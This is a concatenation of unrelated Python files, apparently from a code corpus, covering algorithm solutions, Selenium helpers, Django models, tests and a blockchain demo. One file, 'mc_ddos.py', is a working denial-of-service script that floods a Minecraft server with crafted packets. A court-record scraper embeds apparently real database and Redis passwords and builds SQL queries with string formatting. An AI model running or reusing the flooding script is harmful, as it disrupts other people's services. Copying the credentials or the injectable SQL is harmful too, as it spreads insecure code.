f.write('Operation: $' + str(int(line[6:8],2)) + ' = ' + str(regval[int(line[6:8],2)]) + '; ' + '\n')
f.write('PC is now at ' + str(PC) + '\n')
f.write('DIC is now at '+str(DIC))
# addu not really implemented, but in theory in should be,
# however we wrote the input so it doesn't cause any issues
# at the moment
elif(line[0:4] == addu):
DIC += 1
PC += 4
regval[int(line[4:6],2)] += regval[int(line[6:8],2)]
f.write('Operation: $' + str(int(line[4:6],2)) + ' = ' + str(regval[int(line[4:6],2)]) + '; ' + '\n')
f.write('PC is now at ' + str(PC) + '\n')
f.write('DIC is now at '+str(DIC))
#this instruction is mainly used for setting equal to 0
elif(line[0:4] == sub):
DIC += 1
PC += 4
regval[int(line[4:6],2)] -= regval[int(line[6:8],2)]
f.write('Operation: $' + str(int(line[4:6],2)) + ' = ' + str(regval[int(line[4:6],2)]) + '; ' + '\n')
f.write('PC is now at ' + str(PC) + '\n')
f.write('DIC is now at '+str(DIC))
#andi
elif(line[0:4] == and1):
DIC += 1
PC += 4
regval[int(line[4:6],2)] = regval[int(line[4:6],2)] & regval[int(line[6:8],2)]
f.write('Operation: $' + str(int(line[4:6],2)) + ' = ' + str(regval[int(line[4:6],2)]) + '; ' + '\n')
f.write('PC is now at ' + str(PC) + '\n')
f.write('DIC is now at '+str(DIC))
# xor
elif (line[0:4] == xor):
DIC += 1
PC += 4
regval[0] = regval[int(line[4:6],2)] ^ regval[int(line[6:8],2)]
f.write('Operation: $0 = ' + str(regval[0]) + '; ' + '\n')
f.write('PC is now at ' + str(PC) + '\n')
f.write('DIC is now at '+ str(DIC))
#Fold
elif (line[0:4] == Fold):
#Always comes out from C = $0
DIC += 1
PC += 4
result = regval[int(line[4:6],2)] * regval[int(line[6:8],2)]
regval[LO] = result & 0b11111111
regval[HI] = result >> 8
regval[int(line[6:8],2)] = regval[HI] ^ regval[LO]
f.write('Operation: $' + str(0) + ' = ' + str(regval[0]) + '; ' + '\n')
f.write('PC is now at ' + str(PC) + '\n')
f.write('DIC is now at '+str(DIC))
#initli: lower 4 bit intialization (only usable with $1)
elif (line[0:2] == initlo):
DIC += 1
PC += 4
reg = int(line[2:4], 2)
imm = int(line[4:8], 2)
regval[reg] += imm
f.write('Operation: $' + str(reg) + ' lower 4 bits = ' + str(imm) + '; ' + '\n')
f.write('PC is now at ' + str(PC) + '\n')
f.write('DIC is now at '+str(DIC))
#initui: upper 4 bit intialization (only usable with $1)
elif (line[0:2] == inithi):
DIC += 1
PC += 4
reg = int(line[2:4], 2)
imm = int(line[4:8], 2)
regval[reg] += imm << 4
f.write('Operation: $' + str(reg) + ' upper 4 bits = ' + str(imm) + '; ' + '\n')
f.write('PC is now at ' + str(PC) + '\n')
f.write('Registers that have changed: ' + '$' + str(reg) + ' = ' + str(imm) + '\n')
f.write('DIC is now at '+str(DIC))
# Specific branch function to be used with hash only
# it loops back to the first line of the code and
# increments contents of register A till it's 255
elif (line[0:4] == Hash_branch):
DIC += 1
if(regval[A] != 255):
PC = 0
lineCount = 0
regval[A] += 1
f.write('PC is now at ' + str(PC) + '\n')
f.write('Branch Taken. No Registers have changed. \n')
f.write('DIC is now at '+str(DIC))
continue
f.write('Branch not taken, no Registers have changed. \n')
f.write('DIC is now at '+str(DIC))
PC += 4
lineCount += 1
f.write("REGISTERS:")
f.write("-----------")
for x in range(len(regval)):
if (x == LO):
f.write("LO: " + str(hex(regval[x])))
elif (x == HI):
f.write("HI: " + str(hex(regval[x])))
elif (x == A):
f.write("A: " + str(hex(regval[x])))
else:
f.write("$"+ str(x) + ": " + str(hex(regval[x])))
f.write("PC: " + str(hex(PC)))
f.write("DIC: " + str(hex(DIC)))
f.write("\n")
f.write("USED MEMORY VALUES:\n")
f.write("---------------------------------------------------------------------\n")
for x in range(4, len(MEM), 1):
f.write("At " + str(x) + "\tA = " + str(x-3) +"\tC = "+ str(MEM[x]) + " ")
if (x - 3) % 4 == 0:
f.write("\n")
f.write("\n")
f.write("\nMODES OF 2 BIT BINARY RESULTS (in decimal)\n")
f.write("----------------------------------------")
for x in range (0,4,1):
f.write("\nMem["+str(x)+"] = ")
f.write(str(MEM[x]))
f.write("\n")
f.close()
main()
|
# 76. Minimum Window Substring
# Given two strings s and t of lengths m and n respectively,
# return the minimum window substring
# of s such that every character in t (including duplicates) is included in the window.
# If there is no such substring, return the empty string "".
# The testcases will be generated such that the answer is unique.
# Example 1:
# Input: s = "ADOBECODEBANC", t = "ABC"
# Output: "BANC"
# Explanation: The minimum window substring "BANC" includes 'A', 'B', and 'C' from string t.
# Example 2:
# Input: s = "a", t = "a"
# Output: "a"
# Explanation: The entire string s is the minimum window.
# Example 3:
# Input: s = "a", t = "aa"
# Output: ""
# Explanation: Both 'a's from t must be included in the window.
# Since the largest window of s only has one 'a', return empty string.
from collections import Counter
def minWindow(s,t):
req = Counter(t) # Hash table to store the char frequency
missing=len(t) # Total number of chars we care
i = 0
start = 0
end = 0
for j, char in enumerate(s, 1): # Index j from 1
missing -= req[char] > 0
req[char] -=1
if not missing:
while req[s[i]] < 0:
req[s[i]] +=1
i+=1
if not end or j - i <= end - start: # Update Window
start, end = i, j
req[s[i]] += 1
i +=1 # Update i to start+1 for next window
missing +=1 # We missed the first chars, so add missing by 1
return s[start:end]
if __name__ == "__main__":
s = "ADOBECODEBANC"
#s ="ABCDOODEBANC"
t = "ABC"
print ("The characters are {}".format(minWindow(s,t)))
|
# encondding = utf - 8
#用于实现具体动作,比如输入数据框
from selenium import webdriver
from config.VarConfig import ieDriverFilePath
from config.VarConfig import chromeDriverFilePath
from config.VarConfig import firefoxDriverFilePath
from util.ObjiectMap import getElement,getElements
from selenium.webdriver.support.ui import Select
from util.ClipboardUtil import Clipbard
from util.KeyBoradUtil import KeyboardKeys
from util.DirAndTime import *
from util.WaitUtil import WaitUtil
# from config.VarConfig import *
from selenium.webdriver.chrome.options import Options
from selenium.webdriver.support import expected_conditions as EC
import time
from selenium.webdriver.common.keys import Keys
import json
# 定义全局变量
driver = None
# 全局的等待类实例对象
waitUtil = None
def open_browser(browserName, *args):
# 打开浏览器
global driver,waitUtil
try:
if browserName.lower() == 'ie':
driver = webdriver.Ie(executable_path=ieDriverFilePath)
elif browserName.lower() == 'Firfox':
driver = webdriver.Firefox(executable_path=firefoxDriverFilePath)
# driver = webdriver.Chrome(executable_path=chromeDriverFilePath)
# # 创建chrome浏览器的一个options实例对象
# chrome_options = Options()
# # 添加屏蔽 ---ignore -certificate --errors
# chrome_options.add_experimental_option("excludeSwitches", ["ignore-certificate-errors"])
# driver = webdriver.Chrome(executable_path=chromeDriverFilePath,
# chrome_options=chrome_options)
else:
driver = webdriver.Chrome(executable_path=chromeDriverFilePath)
# driver 对象创建成果,创建等待类实例对象
waitUtil = WaitUtil(driver)
except Exception as e:
raise e
def visit_url(url,*arg):
# 访问某个网站
global driver
try:
driver.get(url)
except Exception as e:
raise e
def close_browser(*arg):
# 关闭浏览器
global driver
try:
driver.quit()
except Exception as e:
raise e
def sleep(sleepSeconds, *arg):
# 强制等待
try:
time.sleep(int(sleepSeconds))
except Exception as e:
raise e
def clear(loctaionType, locatiorExpression, *arg):
# 清除输入框默认内容
global driver
try:
getElement(driver, loctaionType, locatiorExpression).clear()
except Exception as e:
raise e
def input_string(locationType, locatorExpression, inputContent):
# 在页面输入框中输入数据
global driver
try:
getElement(driver, locationType, locatorExpression).send_keys(inputContent)
# print(inputContent)
except Exception as e:
raise e
def click(locationType, locatorExpression, *arg):
# 单击页面元素
global driver
try:
getElement(driver, locationType, locatorExpression).click()
except Exception as e:
raise e
def assert_string_in_pagesource(assertSring, *arg):
# 断言页面源码是否存在某关系字或者关键字符串中
global driver,waitUtil
try:
assert assertSring in driver.page_source, ("%s not foud in page source!" )% assertSring
except ArithmeticError as e:
raise ArithmeticError(e)
except Exception as e:
raise e
def assert_title(titleStr, *args):
# 断言页面标题是否存在给定的关键字符串
global driver,waitUtil
try:
assert titleStr in driver.title, \
"%s not found in title!" % titleStr
except ArithmeticError as e:
raise ArithmeticError(e)
except Exception as e:
raise e
def getTitle(*arg):
# 获取页面标题
global driver
try:
return driver.title
except Exception as e:
raise e
def getPageSouce(*arg):
global driver
try:
return driver.page_source
except Exception as e:
raise e
def switch_to_frame(locationType, frameLocatorExpression, *arg):
# 切换进入frame
global driver
try:
driver.switch_to.frame(getElement
(driver, locationType, frameLocatorExpression))
except Exception as e:
print("frame error")
raise e
def switch_to_default_content(*arg):
# 切出frame
global driver
try:
driver.switch_to.default_content()
except Exception as e:
raise e
#点击多选框
def clickCheckBox(locationType,framelocatorExpression,*args):
global driver,waitUtil
try:
ListElement=getElements(driver,locationType,framelocatorExpression)
print(ListElement)
for element in ListElement:
element.click()
except Exception as e:
raise e
# #下拉列表选择
# def selecter_list(locationType,framelocatorExpression,textValue,*args):
# global driver,waitUtil
# try:
# select_element=Select(getElement(driver,locationType,framelocatorExpression))
# select_element.select_by_visible_text(textValue)
# value= select_element.all_selected_options[0].text
# assert value==textValue,"断言失败,当前选择的不是%s"%textValue
# except AssertionError as e:
# raise AssertionError(e)
# except Exception as e:
# raise e
# else:
# logger.info("\033[1;32;m关键字%s选择成功\033[0m" % textValue)
# 使用cooki登录新的页面
def new_browser(url):
# driver = webdriver.Chrome()
# browser.delete_all_cookies() #清除所有cookie
driver.set_page_load_timeout(20)
driver.set_script_timeout(20)
try:
driver.get(url)
except:
driver.execute_script("window.stop()")
time.sleep(5)
f1 = open(r'G:\KeyWordFromeWork\testData\cookies4.12.01.txt')
cookies = f1.read()
cookies = json.loads(cookies)
#添加cookie到未登的录页面
for co in cookies:
driver.add_cookie(co)
driver.refresh() #再次刷新页面则得到登陆后的界面
time.sleep(5)
# driver.close()
def paste_string(pasteString, *arg):
# 模拟操作Ctrl+ v 操作
global driver
try:
Clipbard.setTest(pasteString)
# 等待2秒,防止代码执行的太快,而未成功粘贴内容
time.sleep(2)
KeyboardKeys.twoKeys("ctrl", "v")
except Exception as e:
raise e
def press_tab_key(*arg):
# 模拟tab键
try:
KeyboardKeys.oneKey("tab")
except Exception as e:
raise e
def press_enter_key(*arg):
# 模拟enter键
try:
KeyboardKeys.oneKey("enter")
except Exception as e:
raise e
def maximize_brower():
# 窗口最大化
global driver
try:
driver.maximize_window()
except Exception as e:
raise e
def capture_screen(*args):
# 截取屏幕图片
global driver
currTime = getCurrentTime()
picNameAndPath = str(createCureenDateDir()) + "\\" + str(currTime) + ".Png"
try:
driver.get_screenshot_as_file(picNameAndPath.replace('\\', r'\\'))
except Exception as e:
raise e
else:
return picNameAndPath
def waitPressenceOfElementLocated(locationType, locatorExprexxion, *arg):
# 显示等待页面元素出现的DOM中,但并不一定可见 存在则返回页面元素对象
global waitUtil
try:
waitUtil.presenceOfeElmentLocated(locationType, locatorExprexxion)
except Exception as e:
raise e
def waitFrameToBeAvailableAndSwitchToIt(locationType, locatorExprexxion, *args):
# 检查frame 是否存在,存在则切换进frame控件中
global driver
try:
driver.switch_to.frame(getElement(driver,locationType, locatorExprexxion))
except Exception as e:
# print("error...")
raise e
def waitVisibilityOfElementLocated(locationType, locatorExprexxion):
# 显示等待页面元素出现在DOM 中并且可见,存在返回该页面元素对象
global waitUtil
try:
waitUtil.visibilityOfElementLocated(locationType, locatorExprexxion)
except Exception as e:
raise e
if __name__ =="__main__":
assert_string_in_pagesource("发送成功") |
import socket
import sys
try:
host = sys.argv[1]
port = 25565
except IndexError:
print "[+] Usage %s <host> " % sys.argv[0]
print "[i] Example: mc_ddos.py localhost"
sys.exit()
#rootbuffer = "1000bc02093132372e302e302e3163dd020900076d65726b333630" #other buffer switch if you want to
#rootbuffer = "1000bc020931302e302e312e313263dd020900076d65726b333630" #other buffer switch if you want to
rootbuffer = "1500bc020e3135382e36392e3132322e31333463dd020900076d65726b333630" # test buffer not fully functional
buffer = rootbuffer.decode("hex")
#Second packet information for mc server ddos
secondbufferhex = "85020180017b757f9c415785c2515086c02fbb353ec7e8fa1dbd52d722145e7a47623e1b88b5e427d5737989e202000cca4acad2ad8566a1da11e015c12e060c0bb6e62deace9ccb8658e1d2190bc2b0c33fd01d6b58b5c9406638f2b221fa82b46e9b399dea8b6dfe21ff49f85bf6ef05eff5c82d909e0a4c74e3c528f45b7bee216d24fa800174a01e725d9a5308ede10f09e12e18f15ce25241fb7dbc2f927a9558d29f879f4512b3a1eb26fc1bb6eaab7ec300a7e5607a06d655334624a55eebd6856cd790a4ac78728b4ec6b96eca403ec9d103cdf178b6127e3a592050546318cd09806737b1bd8aa5374b67228d192269424d6c5f27c1c183c86798708b6bb259c9f71c"
secondbuffer = secondbufferhex.decode("hex")
while 1:
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=s.connect((host,port))
s.settimeout(4500) # change for different effect based on target max timeout
sendbuffer = buffer
s.send(sendbuffer)
s.recv(4906)
s.send(secondbuffer)
s.setsockopt(SOL_SOCKET, TCP_WINDOW_CLAMP, 5)
s.close()
|
'''
Created on Oct 24, 2016
@author: Noor Jahan Mukammel
Program: set_method: remove(el)
* works like discard()
* but if el is not a member of the set
* a KeyError will be raised.
'''
x = {"a","b","c","d","e"}
print(x.remove("a")) # difference_update() function returns "None"
print(x)
# x.remove("z") # This gives an error because "z" is not an element of set x |
import threading
import hashlib
import json
import sys
from datetime import datetime, timezone
from random import randint
from collections import namedtuple
import blockchain
Headers = namedtuple('Headers', [
'index',
'time',
'nonce',
'tx',
'mrkl_root',
'curr_hash',
'prev_hash'
])
class Miner:
def __init__(self, address, version, _blockchain, mined_evt):
self._address = address
self._version = version['id']
self._difficulty = version['difficulty']
self._blockchain = _blockchain
self._mined_evt = mined_evt
self._t = None
def start(self, headers, txs):
self._t = threading.Thread(target=self.run, args=(headers, txs))
self._t.start()
@staticmethod
def create_hash(encoded_headers_arr, nonce):
encoded_headers = b''.join(
encoded_headers_arr + [str(nonce).encode()])
return hashlib.sha256(encoded_headers).hexdigest()
@staticmethod
def create_merkle_root(transactions):
def encode(transaction):
return json.dumps(
transaction, sort_keys=True).encode()
encoded_list = [encode(transaction) for transaction in transactions]
encoded_bytes = b''.join(encoded_list)
return hashlib.sha256(encoded_bytes).hexdigest()
def run(self, time, txs):
prev_block = self._blockchain.get_last_block()
index = str(int(prev_block["index"]) + 1)
prev_hash = prev_block["hash"]
mrkl_root = self.create_merkle_root(txs)
headers = [index, time, mrkl_root, prev_hash]
nonce = randint(0, sys.maxsize)
encoded_header_arr = [val.encode() for val in headers]
block_hash = self.create_hash(encoded_header_arr, nonce)
while not self._mined_evt.is_set():
if block_hash[:self._difficulty] == ''.zfill(self._difficulty):
block_headers = Headers(
index, time, nonce, txs, mrkl_root, block_hash, prev_hash)
block = self.create_block(block_headers)
res = self._blockchain.offer_proof_of_work(
block, self._mined_evt)
if res:
break
nonce = randint(0, sys.maxsize)
block_hash = self.create_hash(encoded_header_arr, nonce)
def create_block(self, block_headers):
"""Create a new block
Returns:
Dict[str, Any]: The newly created block.
"""
return {
'index': str(block_headers.index),
"ver": self._version,
'time': block_headers.time,
'nonce': str(block_headers.nonce),
'tx': block_headers.tx,
'n_tx': len(block_headers.tx),
'mrkl_root': block_headers.mrkl_root,
'hash': block_headers.curr_hash,
'previous_hash': block_headers.prev_hash,
'relayed_by': self._address,
}
def join(self):
self._t.join()
lock = threading.Lock()
blockchain = blockchain.Blockchain(1, 4, [], None, lock)
def mine_block():
mined_evt = threading.Event()
time_now = datetime.now(timezone.utc).strftime("%d-%b-%Y (%H:%M:%S.%f)")
wallets = [
'1',
'2',
'3',
'6',
'4',
'9'
]
miners = []
for public_address in wallets:
version = {
'id': 1,
'difficulty': 4
}
miners.append(Miner(public_address, version, blockchain, mined_evt))
for miner in miners:
miner.start(time_now, [{'sender': 'me'}])
for miner in miners:
miner.join()
for i in range(20):
mine_block()
# blockchain.print_chain()
for block in blockchain:
print(block["index"])
|
import httplib
import urllib
import base64
import json
import sys
import settings
from syslogger import logger
def get_tags(data, conf_threshold=settings.confidence_threshold):
tag_str = ""
for tag in data["tags"]:
if float(tag["confidence"]) >= conf_threshold:
if tag_str != "":
tag_str = "{0}, {1}".format(tag_str, tag["name"])
else:
tag_str = tag["name"]
return tag_str
def get_celebrities(data, conf_threshold=settings.confidence_threshold):
celeb_str = ""
for category in data["categories"]:
if "detail" in category.keys():
celebrities = category["detail"]["celebrities"]
for celeb in celebrities:
if celeb["confidence"] >= conf_threshold:
if celeb_str != "":
celeb_str = "{0}, {1}".format(celeb_str, celeb["name"])
else:
celeb_str = celeb["name"]
return celeb_str
def analyse_image(source_image, az_subs_key=settings.subscription_key):
headers = {
# Request headers
'Content-Type': 'application/octet-stream',
'Ocp-Apim-Subscription-Key': az_subs_key,
}
params = urllib.urlencode({
# Request parameters
'visualFeatures': 'Tags, Description',
'details': 'Celebrities',
})
try:
# Read the file into memory
f = open(source_image, 'r')
post_body = f.read()
f.close()
conn = httplib.HTTPSConnection('api.projectoxford.ai')
conn.request("POST", "/vision/v1.0/analyze?%s" % params, post_body, headers)
response = conn.getresponse()
js_data = response.read()
logger.debug("Azure Analyse returned {}".format(js_data))
data = json.loads(js_data)
conn.close()
return { 'tags' : get_tags(data), 'celebrities' : get_celebrities(data) }
except Exception as e:
logger.warning(e)
|
from urllib2 import urlopen
import json
import statsmodels.api as sm
import pandas
from datetime import datetime
import time
from sqlalchemy import create_engine #SQLAlchemy might need to be installed and PyMYSQL
import calendar
def create_connection():
engine = create_engine('mysql+pymysql://aashu:aashu@localhost/apidata', connect_args= dict(host='127.0.0.1'),echo=False)
cnxn = engine.raw_connection()
cursor = cnxn.cursor()
return cursor, cnxn
cursor, cnxn = create_connection()
def predict ():
curr_timestamp = time.time()
proper_curr_format = datetime.fromtimestamp(curr_timestamp)
sum_occupancy = 0;
for x in range(0,7):
d = datetime(year=2015, month=10, day=(9+x), hour=proper_curr_format.hour, minute=proper_curr_format.minute)
prev_timestamp = calendar.timegm(d.utctimetuple())
cursor.execute("""select maxoccupancy from bid_data where timestamp = (%s)""",(prev_timestamp))
for (maxoccupancy) in cursor:
sum_occupancy += maxoccupancy[0]
return int(sum_occupancy / 7)
|
# Generated by Django 3.0.7 on 2021-07-13 16:29
from django.db import migrations, models
import phonenumber_field.modelfields
class Migration(migrations.Migration):
dependencies = [
('foodcartapp', '0045_auto_20210201_1929'),
]
operations = [
migrations.AlterField(
model_name='order',
name='payment_method',
field=models.IntegerField(choices=[(1, 'Наличностью'), (2, 'Электронно')], db_index=True, default=1, verbose_name='Способ оплаты'),
),
migrations.AlterField(
model_name='order',
name='phonenumber',
field=phonenumber_field.modelfields.PhoneNumberField(db_index=True, max_length=20, region='RU', verbose_name='Мобильный номер'),
),
migrations.AlterField(
model_name='order',
name='status',
field=models.IntegerField(choices=[(1, 'Необработанный'), (2, 'Готовится'), (3, 'Выполнен')], db_index=True, default=1, verbose_name='Статус заказа'),
),
]
|
import pytest
from mock import patch, Mock
from processing.image_publishing import ImgPublisher
from external_api.dbx import RussDropBox
from external_api.gcp_pubsub import ImgPathPubisher
@pytest.fixture
def publisher():
yield ImgPublisher( RussDropBox('',True, 100), None)
def test_should_skip_thumbnail(mocker):
publisher = ImgPublisher( RussDropBox('',True, 100), None)
mocker.patch('processing.image_publishing.RussDropBox.get_image_paths', return_value = ['my_thumb_nail'])
paths = list(publisher.publish_dbx_library())
assert len(paths) == 0
def test_should_return_non_thumbnails(mocker):
publisher = ImgPublisher( RussDropBox('',True, 100), None)
mocker.patch('processing.image_publishing.RussDropBox.get_image_paths', return_value = ['my_thumb_nal'])
paths = list(publisher.publish_dbx_library(True))
assert len(paths) == 1
@patch.object(RussDropBox, 'get_image_paths')
def test_should_skip_thumbnail(mock_my_method, publisher):
mock_my_method.return_value = ['my_thumb_nail']
paths = list(publisher.publish_dbx_library())
assert len(paths) == 0
@patch.object(RussDropBox, 'get_image_paths')
@pytest.mark.parametrize("filenames, return_count",
[(["'my_thumb_nail"],0),
(["'my_thumb_nal"],1),
(["'my_thumb_nal", "nal2"],2)])
def test_should_skip_thumbnails_but_run_others(mock_my_method, publisher, filenames, return_count):
mock_my_method.return_value = filenames
paths = list(publisher.publish_dbx_library(True))
assert len(paths) == return_count
@patch('external_api.gcp_pubsub.ImgPathPubisher')
@patch('external_api.dbx.RussDropBox')
@pytest.mark.parametrize("filenames",
[["'my_thumb_nal"], ["'my_thumb_nal2", "nal2"]])
def test_should_skip_thumbnails_but_run_others2(mock_dropbox, mock_messaging, filenames):
dbx_mock = mock_dropbox.return_value
dbx_mock.get_image_paths.return_value = filenames
pub_mock = mock_messaging.return_value
my_publisher = ImgPublisher( dbx_mock, pub_mock)
# important to wrap in list, so the yield is exercised
list(my_publisher.publish_dbx_library(False))
assert pub_mock.publish.call_count == len(filenames)
|
import numpy
number= input( 'Enter number x: ') # '2' 2
number2= input('Enter number y: ')
print('0076491')
|
tree = ["chapter 1",
["section 1.1",
["paragraph 1.1.1",
"paragraph 1.1.2",
"paragraph 1.1.3",],
"section 1.2",
["paragraph 1.2.1",]],
"chapter 2",
["section 2.1",
["paragraph 2.1.1",
"paragraph 2.1.2",],
"section 2.2",],
"chapter 3",
["section 3.1",
"section 3.2",]]
|
# uncompyle6 version 3.7.4
# Python bytecode 2.7 (62211)
# Decompiled from: Python 3.8.5 (default, Aug 12 2020, 00:00:00)
# [GCC 10.2.1 20200723 (Red Hat 10.2.1-1)]
# Embedded file name: c:\Jenkins\live\output\Live\win_64_static\Release\python-bundle\MIDI Remote Scripts\ableton\v2\control_surface\elements\slider.py
# Compiled at: 2020-05-05 13:23:28
from __future__ import absolute_import, print_function, unicode_literals
import Live
from ..input_control_element import MIDI_NOTE_TYPE
from .encoder import EncoderElement
class SliderElement(EncoderElement):
def __init__(self, msg_type, channel, identifier, *a, **k):
assert msg_type is not MIDI_NOTE_TYPE
super(SliderElement, self).__init__(msg_type, channel, identifier, map_mode=Live.MidiMap.MapMode.absolute, *a, **k)
# okay decompiling /home/deniz/data/projects/midiremote/Live 10.1.18/ableton/v2/control_surface/elements/slider.pyc
|
from django.db import models
# Create your models here.
class type(models.Model):
category = models.CharField(max_length=64,null=False)
class website(models.Model):
url = models.CharField(unique=True,max_length=255,null=False)
ip = models.CharField(default="0.0.0.0",max_length=32)
port = models.IntegerField(default=80)
name = models.CharField(max_length=255,null=False)
types = models.ForeignKey(to="type",to_field="id",default=1)
verbose = models.CharField(max_length=1024)
# ctime = models.TimeField(auto_now=True)
class scan_times(models.Model):
time = models.CharField(db_index=True,max_length=255,null=True)
websites = models.ForeignKey(to="website",to_field="id")
status = models.CharField(max_length=255)
message = models.CharField(max_length=255)
|
#https://www.hackerrank.com/challenges/angry-professor
t = int(input())
for i in range(t):
n, k = map(int, input().split())
arrived_time = list(map(int, input().split()))
if n - len(list(filter(lambda n: n > 0, arrived_time))) < k:
print("YES")
else:
print("NO")
|
import requests
import json
import random
import execjs
import pymysql
import redis
class IdSpider(object):
def __init__(self):
super().__init__()
self.db = pymysql.connect(host='rm-wz9wj90j9qzcfasz6.mysql.rds.aliyuncs.com', user='root', port=3306, password='qazwsx12!@',
database='wenshu', charset='utf8')
self.create_table()
self.url = 'http://wenshu.court.gov.cn/List/ListContent'
self.param = ''
self.index = 1
self.page = 20
self.order = '法院层级'
self.direction = 'asc'
self.USER_AGENTS = [
'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36',
'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36',
'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36',
'Mozilla/5.0 (Windows NT 5.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36',
'Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36',
'Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36',
'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36',
'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36',
'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36',
'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.104 Safari/537.36'
]
def get_content(self, Param='', Index=1, Page=5, Order='法院层级', Direction='asc', vl5x=None, number=None, guid=None,
vjkl5=None):
url = 'http://wenshu.court.gov.cn/List/ListContent'
headers = (
{
'user-agent': random.choice(self.USER_AGENTS),
'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8'
}
)
cookies = {
'vjkl5': vjkl5
}
data = {
'Param': Param,
'Index': Index,
'Page': Page,
'Order': Order,
'Direction': Direction,
'vl5x': vl5x,
'number': number,
'guid': guid
}
res = requests.post(url, data=data, headers=headers, cookies=cookies)
return res.text
def get_code(self, guid):
url = 'http://wenshu.court.gov.cn/ValiCode/GetCode'
s = requests.Session()
s.headers.update(
{
'user-agent': random.choice(self.USER_AGENTS),
'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8'
}
)
data = {
'guid': guid
}
res = s.post(url, data=data)
return res.text
def get_vjkl5(self):
url = 'http://wenshu.court.gov.cn/list/list/?sorttype=1'
headers = (
{
'user-agent': random.choice(self.USER_AGENTS),
}
)
res = requests.get(url, headers=headers)
return res.cookies['vjkl5']
def create_table(self):
sql = '''CREATE TABLE
IF
NOT EXISTS `wenshu_id` (
`paperId` VARCHAR ( 36 ) NOT NULL,
`name` VARCHAR ( 255 ) NOT NULL,
`content` text NOT NULL,
`type` VARCHAR ( 8 ) NOT NULL,
`date` VARCHAR ( 15 ) NOT NULL,
`procedure` VARCHAR ( 20 ) NOT NULL,
`anhao` VARCHAR ( 50 ) NOT NULL,
`courtName` VARCHAR ( 50 ) NOT NULL,
PRIMARY KEY ( `paperId` )
) ENGINE = INNODB DEFAULT CHARSET = utf8'''
with self.db.cursor() as cursor:
cursor.execute(sql)
self.db.commit()
def save_to_table(self, paperId, name, content, type, date, procedure, anhao, courtName):
sql = '''INSERT INTO wenshu_id (paperId, `name`, content, `type`, `date`, `procedure`, anhao, courtName) VALUES
('%s', '%s', '%s', '%s', '%s', '%s', '%s', '%s')''' % \
(paperId, name, content, type, date, procedure, anhao, courtName)
with self.db.cursor() as cursor:
cursor.execute(sql)
self.db.commit()
if __name__ == '__main__':
while True:
r = redis.Redis(host='127.0.0.1', port=6388, password='qazwsx12!@')
# r.lpush('wenshu:id', 74)
idx = r.lpop('wenshu:id')
index = int(idx)
print(index)
with open('./process.js', 'r') as f:
default = execjs.get('phantomjs')
data = f.read()
ect = default.compile(data)
guid = ect.call('getGuid')
so = IdSpider()
number = so.get_code(guid)
vjkl5 = so.get_vjkl5()
vl5x = ect.call('getKey', vjkl5)
text = so.get_content(Index=index, Page=20, Order='法院层级', Direction='asc', vl5x=vl5x, number=number, guid=guid,
vjkl5=vjkl5)
text_pro = text.replace('\\', '')
text_pro = text_pro.lstrip('\"')
text_pro = text_pro.rstrip('\"')
data = json.loads(text_pro)
if data != '':
del data[0]
for case in data:
item = {}
try:
item['content'] = case['裁判要旨段原文']
except:
item['content'] = ''
item['type'] = case['案件类型']
item['date'] = case['裁判日期']
item['name'] = case['案件名称']
item['paperId'] = case['文书ID']
try:
item['procedure'] = case['审判程序']
except:
item['procedure'] = ''
try:
item['anhao'] = case['案号']
except:
item['anhao'] = ''
item['courtName'] = case['法院名称']
try:
so.save_to_table(item['paperId'], item['name'], item['content'], item['type'],
item['date'], item['procedure'], item['anhao'], item['courtName'])
except Exception as e:
print(e) |
# Question2
n = int(input())
nums = list(map(int, input().strip().split()))
nums = sorted(nums, reverse=True)
if len(nums) == 0:
print(0)
niuniu, sheep = 0, 0
for i in range(len(nums)):
if i & 1 == 0:
niuniu += nums[i]
else:
sheep += nums[i]
print(niuniu - sheep) |
import os
from flask_assets import Environment, Bundle
assets = Environment()
css = Bundle(os.getenv('CSS'))
assets.register('css_min', css)
favicon = Bundle('favicon.js')
assets.register('favicon', favicon)
js = Bundle(os.getenv('JS'))
assets.register('scripts', js)
|
import json
class Cfg:
def __init__(self):
f = open('cfg.json', )
data = json.load(f)
rabbit_params = data['rabbitmq']
flask_params = data['flask']
music_server_params = data['music_flask_server']
self.rabbit_host = rabbit_params['host']
self.rabbit_port = rabbit_params['port']
self.rabbit_exchange = rabbit_params['exchange']
self.rabbit_routing_key = rabbit_params['routing_key_format']
self.rabbit_username = rabbit_params['username']
self.rabbit_password = rabbit_params['password']
self.flask_host = flask_params['host']
self.flask_port = flask_params['port']
self.music_flask_host = music_server_params['host']
self.music_flask_port = music_server_params['port']
|
# TREE:: rеprеsеnts thе nоdеs cоnnеctеd by еdgеs.
# - Оnе nоdе is mаrkеd аs Rооt nоdе.
# - Еvеry nоdе except thе rооt is аssоciаtеd with оnе pаrеnt nоdе.
# - Еаch nоdе cаn hаvе аn аrbiаtry numbеr оf child nоdеs.
#
# BINARY TREE :: A tree whose elements have max two children is called a binary tree.
# Each element in a binary tree can have only two children.
# A node’s left child must have a value less than its parent’s value, and
# the node’s right child must have a value greater than its parent value.
#
# =============================================================================
class Node:
def __init__(self, data):
self.left = None
self.right = None
self.data = data
# print the tree
def printTree(self):
if self.left:
